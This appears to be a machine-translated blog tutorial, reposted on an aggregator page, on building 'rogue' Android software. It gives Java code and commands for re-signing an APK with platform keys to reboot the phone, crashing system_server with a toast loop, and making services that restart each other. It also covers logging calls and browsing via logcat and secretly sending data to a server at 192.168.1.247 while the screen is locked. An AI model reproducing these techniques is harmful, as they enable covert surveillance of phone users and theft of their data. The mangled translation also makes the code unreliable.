About Android security and signing APK through commands

Source: Internet
Author: User
1. Restart the mobile phone with 0 permissions:Now let's define a class that implements this function:
/*** Click Event * @ Param view */Public void reboot (view) {intent reboot = new intent (intent. action_reboot); reboot. putextra ("Nowait", 1); reboot. putextra ("interval", 1); reboot. putextra ("window", 0); sendbroadcast (reboot );}

The program is terminated abnormally. logcat controls the output and says it has no permission.

We need to know what permissions are required to restart the mobile phone.

Android: protectionlevel = "signatureorsystem" indicates that the mobile phone can be restarted only when the system program or the program with the same signature and system signature are used. add the missing permissions to the configuration file.<Uses-Permission Android: Name = "android. Permission. Reboot"/>However, the program still has the same error. However, we can increase our program to the system permission (the UID of our program is the same as the system level) by configuring it like this:Android: shareduserid = "android. uid. System"The following error is found after running:

[22:51:26-android_safe_reboot] installation error: install_failed_shared_user_incompatible [22:51:26-android_safe_reboot] Please check logcat output for more details.

[22:51:26-android_safe_reboot] Launch canceled! The installation fails becauseAndroid: shareduserid = "android. uid. System", but the signature of our program is not the system signature. Eclipse uses the debug signature by default.So now our program must be signed by the system. Of course, we can download it from the website. (platform. pk8, platform. x509.pem) What we need to do now is to use the system signature for the program. What should we do? (Signapk. jar,) the first step is to output the program we wrote in eclipse, which can be found in the bin directory. step 2, open the APK and delete the three files in the META-INF (including some default signature information) Step 3, use signapk. use jar to compress the signature. e: \ 2 \ douban4 \ signapk (1) \ signapk> JAVA-jar signapk. jarplatform. x509.pem platfor m.pk8android_safe_reboot.apk(original pakappsreboot.apk (New APK) Then we run the CMD command to install the packaged APK on the simulator. the following error occurs:

Because the simulator already has such a program, but its signature is the debug signature, we know that the unique identification of an application is the package name and signature. Only two programs have the same signature and package name, the two applications are in the same category. if an application needs to be updated, the signature and package name must be kept; otherwise, the update will fail. what are the advantages of using the package name and signature to identify a program? If only the package name is identified, if someone else knows the package name of your program, then someone else can write an alternative program, but like your package name, once installed, you will be overwritten. to sum up, we need to uninstall the program on the simulator (ADB uninstall package name), then we need to install the APK after signature packaging, start the program, and click the button, then the simulator will see the following situation because it is a simulator, and it will stay on this interface all the time. If it is a real machine, this will not happen.

However, this is more troublesome. we can implement it in the following way.

Public void reboot (view) {// use the toast to restart the phone // system_server while (true) {toast mytoast = new toast (this); mytoast. setview (New View (this); mytoast. show ();}}

This code should be written to the sub-thread of the service, so that user requests will not be blocked.2. How can rogue software be built to survive.The 0-Permission program starts at startup, and then creates a program based on it. we know that you do not need to configure any permissions to enable the startup of our program. You only need to write a broadcast. to prevent the user from stopping the service of the program, we can use two services to implement the ondestroy () method of the first service to start the second service in the ondestroy () method of the second service () method to start the first service, so that the service of the program cannot be stopped. then, start several services on the broadcast.3. Is our privacy truly secure?We can use a program to monitor what web pages the user has opened, who has called, and other information. this requires logcat. logcat is divided into four types of log information: main/dev/log/Main this is the log information output by the logcat console. Events/dev/log/events: Radio/dev/log/radio logs related to network communication system/dev/log/system: the system-related log information is now assumed that you have configured the android environment variable, ADB logcat-B radio then we call the simulator through ddms (12121). We can see the trace of the phone number and record the behavior of other users. for example, you can browse a Web page through the events event. now we can record the logcat log information. then we can upload the desired data to the server. use Service to write the logs we need to the file

Use Service to write the required logs to the file. Try {process = runtime.getruntime(cmd.exe C ("logcat-B radio"); inputstream is = process. getinputstream (); bufferedreader BR = new bufferedreader (New inputstreamreader (is); // data/data file = new file (environment. getexternalstoragedirectory (), "log.txt"); fileoutputstream Fos = new fileoutputstream (File); string result = NULL; while (result = BR. readline ())! = NULL) {system. out. println (result); FOS. write (result. getbytes (); FOS. flush () ;}} catch (exception e) {e. printstacktrace ();}

4. Upload data to the server with 0 permissions, and download data from the server with 0 PermissionsWe know that Internet permissions are required for dealing with the Internet. We can simulate uploading when the user locks the screen and stops uploading when the user unlocks the screen.

Public class uploadservice extends Service {private screenoffbroadcastreciver sfreciver; private screenonbroadcastreciver soreciver; private keyguardmanager; handler; @ overridepublic void oncreate () {super. oncreate (); // about the keyboard service keyguardmanager = (keyguardmanager) getsystemservice (keyguard_service); handler = new handler (); soreciver = new screenonbroadcastreciver (); sfreciver = New SC Reenoffbroadcastreciver (); // The broadcast recipients are concerned about and register the two Broadcast recipients intentfilter onintentfilter = new intentfilter ("android. intent. action. screen_on "); registerreceiver (soreciver, onintentfilter); intentfilter offintentfilter = new intentfilter (" android. intent. action. screen_off "); registerreceiver (sfreciver, offintentfilter) ;}@ overridepublic ibinder onbind (intent) {return NULL;} // The broadcast class screenoffbroa corresponding to the screen lock Dcastreciver extends broadcastreceiver {@ overridepublic void onreceive (context, intent) {system. out. println ("screen lock"); // starts to upload data handler after Ms. postdelayed (R, 500) ;}// the corresponding broadcast class screenonbroadcastreciver extends broadcastreceiver {@ overridepublic void onreceive (context, intent) {system. out. println ("screen on"); // cancel data upload handler. removecallbacks (r); // simulate the intent inten of the home key. T2 = new intent (intent. action_main); intent2.setflags (intent. flag_activity_new_task); // note intent2.addcategory (intent. category_home); context. startactivity (intent2) ;}} private runnable r = new runnable () {@ override public void run () {// If the status is locked if (keyguardmanager. inkeyguardrestrictedinputmode () {// get upload the content with your string hackinfo = "http: // 192.168.1.247: 8080/data. JSP? Data = "+ new random (). nextfloat (); intent it = new intent (); it. setflags (intent. flag_activity_new_task); Uri uri = Uri. parse (hackinfo); it. setaction (intent. action_view); it. setdata (URI); startactivity (it); system. out. println ("submit data" + hackinfo); // upload handler once every 5 seconds. postdelayed (R, 5000 );}}};}
But the above problem is that the browser should not be started. If you start the browser, you will find that the browser has been started. 0. The permission is used to upload data to the server. You only need to use the get method followed by parameters such as http: // 192.168.1.1: 8080/dd.zip. Run the following command to sign the APK:
Go to the JDK installation directory, such as c: \ Program Files \ Java \ jdk1.6.0 _ 10 \ bin, and run the following command to sign the unsigned APK ..
Jarsigner-verbose-keystore XXX. keystore-signedjar out.apk in.apk XXX. keystore

Thank you for your criticism.

Reprinted please indicate the source: http://blog.csdn.net/johnny901114/article/details/7536796
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.